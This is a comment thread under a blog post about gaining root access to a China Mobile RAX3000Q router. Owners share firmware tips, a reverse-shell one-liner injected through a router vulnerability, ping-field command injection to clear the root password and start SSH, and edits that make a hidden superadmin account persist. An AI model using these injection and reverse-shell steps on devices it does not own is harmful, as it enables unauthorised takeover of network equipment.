posts/rax3000q-get-shell/

[utterances-bot]

中移RAX3000Q路由器解锁telnet/ssh及使用内置的OpenWrt | imlk's blog

https://blog.imlk.top/posts/rax3000q-get-shell/

[lingyinsam]

大佬我在方访问8080端口的时候提示
Index of /
../
modified: Wed, 26 Jan 2022 10:26:17 GMT
directory - 0.53 kbyte
怎么解决啊，求

[imlk0]

@lingyinsam
试试http://192.168.10.1:8080/#/

[xmaojian]

外行请教作者，如何创建反弹shell，我有统信liunx系统，安装了telnet和ash，也在www.revshells.com上生成了命令，是按你的格式依葫芦画瓢的，IP改成了自己liunx电脑的ip，端口还是1031，端口这里搞不懂，当我在liunx中执行该命令时，提示无法连接到远程主机，连接被拒绝，能详细的讲一讲么？另外，liunx下用nmap扫描（我的路由是2022年3月14日生产的），8080端口的version信息工具无法检测出，而是提示一大堆类似网页代码的东西，我有两个RAX3000Q，1个是1.04版的固件，用你的方法正常，这个是1.00的固件，搞不定，在恩山回复中得知，虽然没有那个luci，但是还是可以通过创建反弹shell开启ssh（某个回复是这样说的），能指导一下么？

[xmaojian]

还有网络状态，我的情况：1.04版那个可以登录超级用户的路由是主路由（默认管理ip还是192.168.10.1，之前改了光猫为桥接，弄到了用户名和密码，上网设置成拨号模式），这个1.00的路由是次级路由（改成了上网设置成IP模式，默认管理ip改成了192.168.11.1），

[imlk0]

@xmaojian
反弹shell是你需要在你的Linux电脑上运行nc -lvnp 1031在1031端口上开启监听，然后想办法（比如文中这个漏洞）让路由器去执行下面这个命令

$(TF=$(mktemp -u);mkfifo $TF && telnet 192.168.123.197 1031 0<$TF | ash 1>$TF)

开telnet和ssh不需要反弹shell也行，用超管密码进去有开关开telnet，就已经够用了，你再要开ssh的话，可以直接telnet连进路由器上然后运行/usr/sbin/dropbear -p 22 &开

另外关于新版产品，我手上没有这种版本，建议旧版关闭「TR069功能开关」和「和苗FOTA功能开关」

[xmaojian]

@KB5201314，感谢回复，我试试看，关于新版和旧版，我在恩山有个在你的主题后回复的帖子，复制后回复在这里，作为参考：
我有两个RAX3000Q，两个是不同批次，固件版本不同，一个能用贴主的办法解锁（V1.04），一个不能（v1.0.0,实际使用网络抓包软件看的话，这个1.0.0是一个fake version, ture version是1.1.0），解锁的那个的有些设置页面，未解锁的没有显示，也是不能访问的，但是我试了一下，直接把解锁的那个路由的有些设置页面的地址复制过来，把地址中的ip改成未解锁的路由的ip，即可正常访问并设置，各位有需求的可以试试看，话说还有这种操作，这个算bug么？另外，开启telnet那个页面因为原本就可以使用user用户登录并访问，采用这个办法并不能正常显示，还是权限不够。PS：搞这个操作之前，我刷了上面坛友提供的固件，没刷之前并没有这样测试，请悉知，另外，这个里面的抓包设置，能否对破解有帮助，大神们帮忙看看了。。。

http://192.168.10.1/#/home/diagnosis/tcpdump（远程抓包设置）
http://192.168.10.1/#/home/diagnosis/packetcapture（抓包设置）
http://192.168.10.1/#/home/network/tr069（Tr069远程下发设置）
http://192.168.10.1/#/home/network/fotaSetting（和苗FOTA设置）
http://192.168.10.1/#/home/network/andLink（andlink设置）
http://192.168.10.1/#/home/network/routeList（静态路由）
把上面的192.168.10.1改成你设置的路由访问IP即可，没改就直接复制访问，访问前确保已经用user用户正常登录路由器设置页面

[imlk0]

@KB5201314，感谢回复，我试试看，关于新版和旧版，我在恩山有个在你的主题后回复的帖子，复制后回复在这里，作为参考： 我有两个RAX3000Q，两个是不同批次，固件版本不同，一个能用贴主的办法解锁（V1.04），一个不能（v1.0.0,实际使用网络抓包软件看的话，这个1.0.0是一个fake version, ture version是1.1.0），解锁的那个的有些设置页面，未解锁的没有显示，也是不能访问的，但是我试了一下，直接把解锁的那个路由的有些设置页面的地址复制过来，把地址中的ip改成未解锁的路由的ip，即可正常访问并设置，各位有需求的可以试试看，话说还有这种操作，这个算bug么？另外，开启telnet那个页面因为原本就可以使用user用户登录并访问，采用这个办法并不能正常显示，还是权限不够。PS：搞这个操作之前，我刷了上面坛友提供的固件，没刷之前并没有这样测试，请悉知，另外，这个里面的抓包设置，能否对破解有帮助，大神们帮忙看看了。。。

http://192.168.10.1/#/home/diagnosis/tcpdump（远程抓包设置） http://192.168.10.1/#/home/diagnosis/packetcapture（抓包设置） http://192.168.10.1/#/home/network/tr069（Tr069远程下发设置） http://192.168.10.1/#/home/network/fotaSetting（和苗FOTA设置） http://192.168.10.1/#/home/network/andLink（andlink设置） http://192.168.10.1/#/home/network/routeList（静态路由） 把上面的192.168.10.1改成你设置的路由访问IP即可，没改就直接复制访问，访问前确保已经用user用户正常登录路由器设置页面

@xmaojian 竟然还有这种bug哈哈哈，不过近期没有时间去折腾。

另外有人说只是屏蔽了8080端口上的luci，但是shell注入好像还有用，这个我没有新机器所以没法验证，感兴趣的话你可以试一试。

[onionscode]

你好，请问能帮忙备份下设备的art信息吗
我不小心一顿操作干没了，欲哭无泪啊
麻烦大哥了

[imlk0]

@onionscode 是mtd13吗，我这里有一份之前备份的，不知道是否适合你的设备:)
mtd13.zip

[onionscode]

先谢谢大佬了，等我端午试下

[iwinmin]

@lingyinsam 试试http://192.168.10.1:8080/#/

和我手上的版本一样，拿到 root 权限开了 ssh 进去看了一下， 整个 luci 的目录 /www 已经被清空。 @KB5201314 有没有旧版里面的 luci /www 目录代码，可以打包一份上来么？

[onionscode]

这是来自QQ邮箱的假期自动回复邮件。   您好，我最近正在休假中，无法亲自回复您的邮件。我将在假期结束后，尽快给您回复。

[imlk0]

@lingyinsam 试试http://192.168.10.1:8080/#/

和我手上的版本一样，拿到 root 权限开了 ssh 进去看了一下， 整个 luci 的目录 /www 已经被清空。 @KB5201314 有没有旧版里面的 luci /www 目录代码，可以打包一份上来么？

为什么你的/www是空的，是不小心删掉了吗，如果是这样，重置路由器应该会回来

[iwinmin]

@lingyinsam 试试http://192.168.10.1:8080/#/

和我手上的版本一样，拿到 root 权限开了 ssh 进去看了一下， 整个 luci 的目录 /www 已经被清空。 @KB5201314 有没有旧版里面的 luci /www 目录代码，可以打包一份上来么？

为什么你的/www是空的，是不小心删掉了吗，如果是这样，重置路由器应该会回来

新到手的路由，重置还原，然后用 user 登陆 （superadmin 用户不存在），通过 ping 的漏洞注入清除了 root 密码，启动 dropbear ssh进去看就是空的。 访问 8080 端口和一楼的情况一下，没有 luci 的登陆页面，只有一个空的 autoindex 页面。

这里整理一下我的操作

启用SSH

1. 通过ping输入框删除 root 用户密码
2. 通过ping输入框启动ssh服务器： $(dropbear), 然后就可以用 22 端口 root 登陆路由
3. dropbear ssh 服务器自动启动：编辑 vi /etc/config/dropbear 文件，端口号不是默认的 22，按需修改 （可能就是通过移动的界面启动 SSH 后，访问不到的原因），有一个 enable 启用的选项，把 0 改为 1。
4. 打开 dropbear 自动启动： /etc/init.d/dropbear enable
5. 启动 dropbear: /etc/init.d/dropbear start (默认注入启动 dropbear 占用了22 端口，可以直接重启路由看看是否有效）

添加超级管理员

1. ssh 登陆路由
2. 添加管理员用户: mdlcfg -a SYS_SUPER_LOGIN_NAME="superadmin"
3. 添加管理员密码: mdlcfg -a SYS_SUPER_LOGIN_PWD="83583000"

用户名和密码可以按需设置，添加完后，默认路由页面就可以用管理员登陆了，所有高级管理功能都能看到

[imlk0]

@lingyinsam 试试http://192.168.10.1:8080/#/

和我手上的版本一样，拿到 root 权限开了 ssh 进去看了一下， 整个 luci 的目录 /www 已经被清空。 @KB5201314 有没有旧版里面的 luci /www 目录代码，可以打包一份上来么？

为什么你的/www是空的，是不小心删掉了吗，如果是这样，重置路由器应该会回来

新到手的路由，重置还原，然后用 user 登陆 （superadmin 用户不存在），通过 ping 的漏洞注入清除了 root 密码，启动 dropbear ssh进去看就是空的。 访问 8080 端口和一楼的情况一下，没有 luci 的登陆页面，只有一个空的 autoindex 页面。

这里整理一下我的操作

启用SSH

1. 通过ping输入框删除 root 用户密码
2. 通过ping输入框启动ssh服务器： $(dropbear), 然后就可以用 22 端口 root 登陆路由
3. dropbear ssh 服务器自动启动：编辑 vi /etc/config/dropbear 文件，端口号不是默认的 22，按需修改 （可能就是通过移动的界面启动 SSH 后，访问不到的原因），有一个 enable 启用的选项，把 0 改为 1。
4. 打开 dropbear 自动启动： /etc/init.d/dropbear enable
5. 启动 dropbear: /etc/init.d/dropbear start (默认注入启动 dropbear 占用了22 端口，可以直接重启路由看看是否有效）

添加超级管理员

1. ssh 登陆路由
2. 添加管理员用户: mdlcfg -a SYS_SUPER_LOGIN_NAME="superadmin"
3. 添加管理员密码: mdlcfg -a SYS_SUPER_LOGIN_PWD="83583000"

用户名和密码可以按需设置，添加完后，默认路由页面就可以用管理员登陆了，所有高级管理功能都能看到

我把opkg的package过滤了一下，发现在/www目录下有文件的只有三个package：

luci-base
luci-mod-admin-full
luci-theme-bootstrap

不过我把名字里带luci的package都单独打包起来了，希望有所帮助。export_luci.tar.gz 这里面的包都只是tar包，不能用opkg安装，你需要手动tar xzvf 到根目录上

[iwinmin]

@lingyinsam 试试http://192.168.10.1:8080/#/

和我手上的版本一样，拿到 root 权限开了 ssh 进去看了一下， 整个 luci 的目录 /www 已经被清空。 @KB5201314 有没有旧版里面的 luci /www 目录代码，可以打包一份上来么？

为什么你的/www是空的，是不小心删掉了吗，如果是这样，重置路由器应该会回来

新到手的路由，重置还原，然后用 user 登陆 （superadmin 用户不存在），通过 ping 的漏洞注入清除了 root 密码，启动 dropbear ssh进去看就是空的。 访问 8080 端口和一楼的情况一下，没有 luci 的登陆页面，只有一个空的 autoindex 页面。
这里整理一下我的操作
启用SSH

1. 通过ping输入框删除 root 用户密码
2. 通过ping输入框启动ssh服务器： $(dropbear), 然后就可以用 22 端口 root 登陆路由
3. dropbear ssh 服务器自动启动：编辑 vi /etc/config/dropbear 文件，端口号不是默认的 22，按需修改 （可能就是通过移动的界面启动 SSH 后，访问不到的原因），有一个 enable 启用的选项，把 0 改为 1。
4. 打开 dropbear 自动启动： /etc/init.d/dropbear enable
5. 启动 dropbear: /etc/init.d/dropbear start (默认注入启动 dropbear 占用了22 端口，可以直接重启路由看看是否有效）

添加超级管理员

1. ssh 登陆路由
2. 添加管理员用户: mdlcfg -a SYS_SUPER_LOGIN_NAME="superadmin"
3. 添加管理员密码: mdlcfg -a SYS_SUPER_LOGIN_PWD="83583000"

用户名和密码可以按需设置，添加完后，默认路由页面就可以用管理员登陆了，所有高级管理功能都能看到

我把opkg的package过滤了一下，发现在/www目录下有文件的只有三个package：

luci-base
luci-mod-admin-full
luci-theme-bootstrap

不过我把名字里带luci的package都单独打包起来了，希望有所帮助。export_luci.tar.gz 这里面的包都只是tar包，不能用opkg安装，你需要手动tar xzvf 到根目录上

重新看了一下，应该不是删除了文件那么简单，Lua 的运行文件都没有～ 看来是完全把 luci 的模块都去掉了。

@KB5201314 能分享一下你的 rootfs 和 rootfs_1 两个分区的镜像么？打算找时间拆了用 TTL 线看看能不能设置另外一个分区引导。如果可以的话，就可以尝试直接刷分区看看能不能恢复成旧的版本。

[imlk0]

@lingyinsam 试试http://192.168.10.1:8080/#/

和我手上的版本一样，拿到 root 权限开了 ssh 进去看了一下， 整个 luci 的目录 /www 已经被清空。 @KB5201314 有没有旧版里面的 luci /www 目录代码，可以打包一份上来么？

为什么你的/www是空的，是不小心删掉了吗，如果是这样，重置路由器应该会回来

新到手的路由，重置还原，然后用 user 登陆 （superadmin 用户不存在），通过 ping 的漏洞注入清除了 root 密码，启动 dropbear ssh进去看就是空的。 访问 8080 端口和一楼的情况一下，没有 luci 的登陆页面，只有一个空的 autoindex 页面。
这里整理一下我的操作
启用SSH

1. 通过ping输入框删除 root 用户密码
2. 通过ping输入框启动ssh服务器： $(dropbear), 然后就可以用 22 端口 root 登陆路由
3. dropbear ssh 服务器自动启动：编辑 vi /etc/config/dropbear 文件，端口号不是默认的 22，按需修改 （可能就是通过移动的界面启动 SSH 后，访问不到的原因），有一个 enable 启用的选项，把 0 改为 1。
4. 打开 dropbear 自动启动： /etc/init.d/dropbear enable
5. 启动 dropbear: /etc/init.d/dropbear start (默认注入启动 dropbear 占用了22 端口，可以直接重启路由看看是否有效）

添加超级管理员

1. ssh 登陆路由
2. 添加管理员用户: mdlcfg -a SYS_SUPER_LOGIN_NAME="superadmin"
3. 添加管理员密码: mdlcfg -a SYS_SUPER_LOGIN_PWD="83583000"

用户名和密码可以按需设置，添加完后，默认路由页面就可以用管理员登陆了，所有高级管理功能都能看到

我把opkg的package过滤了一下，发现在/www目录下有文件的只有三个package：

luci-base
luci-mod-admin-full
luci-theme-bootstrap

不过我把名字里带luci的package都单独打包起来了，希望有所帮助。export_luci.tar.gz 这里面的包都只是tar包，不能用opkg安装，你需要手动tar xzvf 到根目录上

重新看了一下，应该不是删除了文件那么简单，Lua 的运行文件都没有～ 看来是完全把 luci 的模块都去掉了。

@KB5201314 能分享一下你的 rootfs 和 rootfs_1 两个分区的镜像么？打算找时间拆了用 TTL 线看看能不能设置另外一个分区引导。如果可以的话，就可以尝试直接刷分区看看能不能恢复成旧的版本。

我这台的所有mtd的备份都在这里了，因为不是在ttl里备份的，所以23和24没能备份出bin文件 :)
https://drive.google.com/file/d/19JRgjW40YCJdOFHnH3CFezPJAg-axUbS/view?usp=sharing

[iwinmin]

@lingyinsam 试试http://192.168.10.1:8080/#/

和我手上的版本一样，拿到 root 权限开了 ssh 进去看了一下， 整个 luci 的目录 /www 已经被清空。 @KB5201314 有没有旧版里面的 luci /www 目录代码，可以打包一份上来么？

为什么你的/www是空的，是不小心删掉了吗，如果是这样，重置路由器应该会回来

新到手的路由，重置还原，然后用 user 登陆 （superadmin 用户不存在），通过 ping 的漏洞注入清除了 root 密码，启动 dropbear ssh进去看就是空的。 访问 8080 端口和一楼的情况一下，没有 luci 的登陆页面，只有一个空的 autoindex 页面。
这里整理一下我的操作
启用SSH

1. 通过ping输入框删除 root 用户密码
2. 通过ping输入框启动ssh服务器： $(dropbear), 然后就可以用 22 端口 root 登陆路由
3. dropbear ssh 服务器自动启动：编辑 vi /etc/config/dropbear 文件，端口号不是默认的 22，按需修改 （可能就是通过移动的界面启动 SSH 后，访问不到的原因），有一个 enable 启用的选项，把 0 改为 1。
4. 打开 dropbear 自动启动： /etc/init.d/dropbear enable
5. 启动 dropbear: /etc/init.d/dropbear start (默认注入启动 dropbear 占用了22 端口，可以直接重启路由看看是否有效）

添加超级管理员

1. ssh 登陆路由
2. 添加管理员用户: mdlcfg -a SYS_SUPER_LOGIN_NAME="superadmin"
3. 添加管理员密码: mdlcfg -a SYS_SUPER_LOGIN_PWD="83583000"

用户名和密码可以按需设置，添加完后，默认路由页面就可以用管理员登陆了，所有高级管理功能都能看到

我把opkg的package过滤了一下，发现在/www目录下有文件的只有三个package：

luci-base
luci-mod-admin-full
luci-theme-bootstrap

不过我把名字里带luci的package都单独打包起来了，希望有所帮助。export_luci.tar.gz 这里面的包都只是tar包，不能用opkg安装，你需要手动tar xzvf 到根目录上

重新看了一下，应该不是删除了文件那么简单，Lua 的运行文件都没有～ 看来是完全把 luci 的模块都去掉了。
@KB5201314 能分享一下你的 rootfs 和 rootfs_1 两个分区的镜像么？打算找时间拆了用 TTL 线看看能不能设置另外一个分区引导。如果可以的话，就可以尝试直接刷分区看看能不能恢复成旧的版本。

我这台的所有mtd的备份都在这里了，因为不是在ttl里备份的，所以23和24没能备份出bin文件 :) https://drive.google.com/file/d/19JRgjW40YCJdOFHnH3CFezPJAg-axUbS/view?usp=sharing

谢谢～

mtd19 至 mtd23， 其实都是 rootfs 的ubi分区，内容其实就是 rootfs 分区里面的内容。
用自带的ubiattach 命令挂载过 rootfs_1 分区，ubi结构和 rootfs 是一样的，所以应该可以搞双启动

周末上ttl看看uboot能不能启动第二个分区看看。能启动就刷起来

[qimowei]

大佬，我家里有个华为的AX3 pro，想用MESH组网这个中移RAX3000Q，奈何跨设备无法MESH，有没有办法把中移RAX3000Q路由器刷成华为的固件呀？万分感谢。

[jiaw-Zh]

@lingyinsam 试试http://192.168.10.1:8080/#/

和我手上的版本一样，拿到 root 权限开了 ssh 进去看了一下， 整个 luci 的目录 /www 已经被清空。 @KB5201314 有没有旧版里面的 luci /www 目录代码，可以打包一份上来么？

为什么你的/www是空的，是不小心删掉了吗，如果是这样，重置路由器应该会回来

新到手的路由，重置还原，然后用 user 登陆 （superadmin 用户不存在），通过 ping 的漏洞注入清除了 root 密码，启动 dropbear ssh进去看就是空的。 访问 8080 端口和一楼的情况一下，没有 luci 的登陆页面，只有一个空的 autoindex 页面。

这里整理一下我的操作

启用SSH

1. 通过ping输入框删除 root 用户密码
2. 通过ping输入框启动ssh服务器： $(dropbear), 然后就可以用 22 端口 root 登陆路由
3. dropbear ssh 服务器自动启动：编辑 vi /etc/config/dropbear 文件，端口号不是默认的 22，按需修改 （可能就是通过移动的界面启动 SSH 后，访问不到的原因），有一个 enable 启用的选项，把 0 改为 1。
4. 打开 dropbear 自动启动： /etc/init.d/dropbear enable
5. 启动 dropbear: /etc/init.d/dropbear start (默认注入启动 dropbear 占用了22 端口，可以直接重启路由看看是否有效）

添加超级管理员

1. ssh 登陆路由
2. 添加管理员用户: mdlcfg -a SYS_SUPER_LOGIN_NAME="superadmin"
3. 添加管理员密码: mdlcfg -a SYS_SUPER_LOGIN_PWD="83583000"

用户名和密码可以按需设置，添加完后，默认路由页面就可以用管理员登陆了，所有高级管理功能都能看到

使用这个命令重置的超级管理员密码
mdlcfg -a SYS_SUPER_LOGIN_NAME="superadmin"
重启后就失效了，大佬有持久化的方法吗

[xiaolan66]

我这条应该是新生产的版本22年89月份的版本，ping界面输入注入代码，网页端直接显示“错误格式”，点击执行也是没有效果，有谁碰到过类似的情况嘛

[zxc173123]

只有admin账号，在后台看到的是V1.0，ping界面输入代码显示“格式错误”，请问新的超级管理员是什么

[kelly94]

路由刚买回来的时候是1.04版本 前一段时间居然自己偷偷升级1.0.0版本 然后shell全无

[RanZ0M]

简单说一下我是怎么排坑的。首先现在我们买到是设备软件版本大部分都已经把楼主的路给堵上了，我们可以用烧回最开始的出厂固件，然后再打开ssh。关于固件的获取方式，可以去搜索“[集客非官方]中移动rax3000q集客非官方固件”。
然后再说一下超级用户名密码持久化的问题。mdlcfg -h打印出来帮助信息之后，我们可以发现使用mdlcfg -c命令可以save all parameters to flash。但是使用mdlcfg -c之后重启发现超级用户名密码依然没有，很显然是开机启动的过程中被删除掉了。去/etc/init.d目录下搜索mdlcfg相关操作，可以在/etc/init.d/tz_process_start这个文件中发现如下代码段
super_login_name=$(mdlcfg -g SYS_SUPER_LOGIN_NAME)
if [ -n "$super_login_name" ]; then
mdlcfg -d SYS_SUPER_LOGIN_NAME
mdlcfg -d SYS_SUPER_LOGIN_PWD
mdlcfg -d SYS_WEB_SUPER_PWD_RULE
mdlcfg -d SYS_SENIOR_LOGIN_NAME
mdlcfg -d SYS_SENIOR_LOGIN_PWD
mdlcfg -d SYS_WEB_SENIOR_PWD_RULE
mdlcfg -d SYS_WEB_SENIOR_PWD_HEAD
mdlcfg -c
fi
很明显，如果存在SYS_SUPER_LOGIN_NAME就把这几个用户名密码全删除，所以我们只需要把这段代码删除掉就可以了。
怎么操作我相信大家应该知道吧，如果实在不知道vi怎么操作的话，
vi /etc/init.d/tz_process_start
将光标移动到super_login_name=$(mdlcfg -g SYS_SUPER_LOGIN_NAME)这一行，11dd
最后:wq或者shift+zz退出
之后再mdlcfg -a SYS_SUPER_LOGIN_NAME="XXXX",
mdlcfg -a SYS_SUPER_LOGIN_PWD="XXXX"，
mdlcfg -c，持久化就做好了。

[kelly94]

简单说一下我是怎么排坑的。首先现在我们买到是设备软件版本大部分都已经把楼主的路给堵上了，我们可以用烧回最开始的出厂固件，然后再打开ssh。关于固件的获取方式，可以去搜索“[集客非官方]中移动rax3000q集客非官方固件”。 然后再说一下超级用户名密码持久化的问题。mdlcfg -h打印出来帮助信息之后，我们可以发现使用mdlcfg -c命令可以save all parameters to flash。但是使用mdlcfg -c之后重启发现超级用户名密码依然没有，很显然是开机启动的过程中被删除掉了。去/etc/init.d目录下搜索mdlcfg相关操作，可以在/etc/init.d/tz_process_start这个文件中发现如下代码段 super_login_name=$(mdlcfg -g SYS_SUPER_LOGIN_NAME) if [ -n "$super_login_name" ]; then mdlcfg -d SYS_SUPER_LOGIN_NAME mdlcfg -d SYS_SUPER_LOGIN_PWD mdlcfg -d SYS_WEB_SUPER_PWD_RULE mdlcfg -d SYS_SENIOR_LOGIN_NAME mdlcfg -d SYS_SENIOR_LOGIN_PWD mdlcfg -d SYS_WEB_SENIOR_PWD_RULE mdlcfg -d SYS_WEB_SENIOR_PWD_HEAD mdlcfg -c fi 很明显，如果存在SYS_SUPER_LOGIN_NAME就把这几个用户名密码全删除，所以我们只需要把这段代码删除掉就可以了。 怎么操作我相信大家应该知道吧，如果实在不知道vi怎么操作的话， vi /etc/init.d/tz_process_start 将光标移动到super_login_name=$(mdlcfg -g SYS_SUPER_LOGIN_NAME)这一行，11dd 最后:wq或者shift+zz退出 之后再mdlcfg -a SYS_SUPER_LOGIN_NAME="XXXX", mdlcfg -a SYS_SUPER_LOGIN_PWD="XXXX"， mdlcfg -c，持久化就做好了。

请教一下如何刷固件 有ttl

[RanZ0M]

简单说一下我是怎么排坑的。首先现在我们买到是设备软件版本大部分都已经把楼主的路给堵上了，我们可以用烧回最开始的出厂固件，然后再打开ssh。关于固件的获取方式，可以去搜索“[集客非官方]中移动rax3000q集客非官方固件”。然后再说一下超级用户名密码持久化的问题。mdlcfg -h打印出来帮助信息之后，我们可以发现使用mdlcfg -c命令可以保存所有参数到flash。但是使用mdlcfg -c之后重启发现超级用户名密码依然没有，很显然是开机启动的过程中被删除掉了。去 /etc/init.d目录下搜索 mdlcfg相关操作，可以在 /etc/init.d/tz_process_start这个文件中发现如下代码段 super_login_name=$（mdlcfg -g SYS_SUPER_LOGIN_NAME） if [ -n “$super_login_name” ];then mdlcfg -d SYS_SUPER_LOGIN_NAME mdlcfg -d SYS_SUPER_LOGIN_PWD mdlcfg -d SYS_WEB_SUPER_PWD_RULE mdlcfg -d SYS_SENIOR_LOGIN_NAME mdlcfg -d SYS_SENIOR_LOGIN_PWD mdlcfg -d SYS_WEB_SENIOR_PWD_RULE mdlcfg -d SYS_WEB_SENIOR_PWD_HEAD mdlcfg -c fi 很明显，如果存在SYS_SUPER_LOGIN_NAME就把这几个用户名密码全删除，所以我们只需要把这段代码删除就可以掉了。怎么操作我相信大家应该知道吧，如果实在不知道vi怎么操作的话， vi /etc/init.d/tz_process_start 将光标移动到super_login_name=$（mdlcfg -g SYS_SUPER_LOGIN_NAME）这一行，11dd 最后：wq或者shift+zz退出 之后再mdlcfg -a SYS_SUPER_LOGIN_NAME=“XXXX”， mdlcfg -a SYS_SUPER_LOGIN_PWD=“XXXX”， mdlcfg -c，持久化就做好了。

请教一下如何刷固件 有ttl

我是直接网页升级的，你可以试一下注意根据你设备的mac选择对应的固件。
如果想要用ttl升级的话，因为我这台我没焊，不过一般都是上电之后按esc进uboot升级，还是尽量网页升级吧

[allblue-z]

简单说一下我是怎么排坑的。首先现在我们买到是设备软件版本大部分都已经把楼主的路给堵上了，我们可以用烧回最开始的出厂固件，然后再打开ssh。关于固件的获取方式，可以去搜索“[集客非官方]中移动rax3000q集客非官方固件”。然后再说一下超级用户名密码持久化的问题。mdlcfg -h打印出来帮助信息之后，我们可以发现使用mdlcfg -c命令可以保存所有参数到flash。但是使用mdlcfg -c之后重启发现超级用户名密码依然没有，很显然是开机启动的过程中被删除掉了。去 /etc/init.d目录下搜索 mdlcfg相关操作，可以在 /etc/init.d/tz_process_start这个文件中发现如下代码段 super_login_name=$（mdlcfg -g SYS_SUPER_LOGIN_NAME） if [ -n “$super_login_name” ];then mdlcfg -d SYS_SUPER_LOGIN_NAME mdlcfg -d SYS_SUPER_LOGIN_PWD mdlcfg -d SYS_WEB_SUPER_PWD_RULE mdlcfg -d SYS_SENIOR_LOGIN_NAME mdlcfg -d SYS_SENIOR_LOGIN_PWD mdlcfg -d SYS_WEB_SENIOR_PWD_RULE mdlcfg -d SYS_WEB_SENIOR_PWD_HEAD mdlcfg -c fi 很明显，如果存在SYS_SUPER_LOGIN_NAME就把这几个用户名密码全删除，所以我们只需要把这段代码删除就可以掉了。怎么操作我相信大家应该知道吧，如果实在不知道vi怎么操作的话， vi /etc/init.d/tz_process_start 将光标移动到super_login_name=$（mdlcfg -g SYS_SUPER_LOGIN_NAME）这一行，11dd 最后：wq或者shift+zz退出 之后再mdlcfg -a SYS_SUPER_LOGIN_NAME=“XXXX”， mdlcfg -a SYS_SUPER_LOGIN_PWD=“XXXX”， mdlcfg -c，持久化就做好了。

请教一下如何刷固件 有ttl

我是直接网页升级的，你可以试一下注意根据你设备的mac选择对应的固件。 如果想要用ttl升级的话，因为我这台我没焊，不过一般都是上电之后按esc进uboot升级，还是尽量网页升级吧

能不能说下具体怎么网页升级的，手头有一个新版，也是各种漏洞已封堵。怎么降级？

[viqbgrg]

@RanZ0M 你好,你是怎么网页降级的?我ttl会卡在一个位置,也不能ttl

[RanZ0M]

读一下这个帖子https://www.right.com.cn/forum/thread-8228139-1-2.html，楼主在里面分享的刷机包里有官方原版的升级包，找到你的设备mac对应的包网页升级然后恢复出厂试一下

[viqbgrg]

@RanZ0M rax3000q_factory_old.ubi 是这几个ubi格式的吗?我改格式为bin刷不成功

[RanZ0M]

@RanZ0M rax3000q_factory_old.ubi 是这几个ubi格式的吗?我改格式为bin刷不成功
翻看了一下我电脑里的文件，就只有一个ubi文件。当时也没有留什么文字记录，具体的细节实在是记不清了，抱歉。

[viqbgrg]

你的ubi是叫什么名字?

[RanZ0M]

你的ubi是叫什么名字?

rax3000q-factory-220106.ubi.xz

[viqbgrg]

你的ubi是叫什么名字?

rax3000q-factory-220106.ubi.xz

好吧,我再试试,你有没有什么bin格式的

[shuaichaomm]

你的ubi是叫什么名字?

rax3000q-factory-220106.ubi.xz

好吧,我再试试,你有没有什么bin格式的

请问你的问题解决了吗？

[viqbgrg]

@shuaichaomm 在网页里面升级不行，ttl刷机了

[mmfan]

软件版本:VS020-EN.ZL.01.26.20230706联通定制版怎么获得超级管理员，多谢

[2096779623]

https://hugo.utermux.dev/default/rax3000q-latest/
新出炉的破解ssh教程

[viqbgrg]

@2096779623 谢谢你的教程，在最新的版本上面有用，不过新版本好像没有超级管理员这个用户了，貌似可以通过修改用户的level的等级解锁登陆页面的功能，但是我好像固化不了，一登陆就个level又恢复到3了

[huajideshutiao]

尝试了下，我这台软件版本是V1.1.0.202201261808，编译时间2022-01-26_18:25，按理说应该也有luci，但是进8080没有，目前用网页降级没成功，卡97％，ssh倒是挺好拿。